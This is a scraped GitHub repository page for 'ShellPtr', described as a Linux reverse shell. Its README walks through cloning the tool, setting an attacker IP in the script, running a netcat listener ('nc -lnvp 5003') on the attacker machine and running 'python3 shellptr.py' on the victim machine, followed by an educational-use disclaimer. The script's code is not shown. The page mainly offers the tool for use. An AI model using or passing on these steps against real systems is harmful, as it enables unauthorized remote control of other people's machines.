Skip to content

PwnHash/ShellPtr

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 

Repository files navigation

version stars forks languages issues platform

Getting Started

  • 1 ) Clone The Repo
git clone https://github.com/PwnHash/ShellPtr.git
  • 2 ) You Need To Navigate To The ShellPtr Directory
cd ShellPtr
  • 3 ) Change The IPv4 Address In The Script

  • 4 ) This Reverse Shell Needs Requirements, Install Them Using The Following Command

pip install -r requirements.txt

If The Steps Above Are Done:


  • On The Attacker Machine:
nc -lnvp 5003
  • On The Victim Machine:
python3 shellptr.py

⚠️ Note:

  • This tool is for educational and ethical purposes only.
  • I'm not responsible for your actions.
  • Don't hack anyone without their permissions.
  • With great force follows great responsibility.

Tested on 5.18.0-kali3-amd64, 5.15.0-48-generic-Ubuntu


About

A Reverseshell for Linux.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages